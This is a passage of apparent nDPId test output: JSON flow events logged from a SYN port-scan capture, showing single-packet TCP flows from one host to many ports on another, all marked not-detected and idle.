{"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1287,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1287,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7435,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7435,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9485,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9485,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1296,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1296,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3351,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3351,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5405,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1309,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5405,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1310,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 